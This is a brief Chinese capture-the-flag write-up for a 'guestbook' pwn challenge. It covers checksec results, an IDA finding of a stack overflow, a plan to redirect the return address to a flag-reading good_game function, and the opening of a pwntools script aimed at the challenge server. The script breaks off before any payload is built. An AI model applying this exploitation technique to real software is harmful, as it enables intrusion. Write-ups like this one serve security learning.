$ checksec --file guestbook [*] '/Users/miao//CTF/PWN/guestbook/guestbook' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
静态分析
直接IDA F5,可以看到一个明显的溢出,并且有一个good_game函数
good_game函数功能为读取flag
那就很明显了,通过溢出修改返回地址为good_game,读取flag
exploit
gdb确认信息及good_game地址
构造exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
from pwn import *
elf = ELF('./guestbook')
sh = remote('pwn.jarvisoj.com', 9876) # sh = process('./guestbook') context.arch = 'amd64' context.log_level = 'debug' good_game_addr = elf.symbols["good_game"]
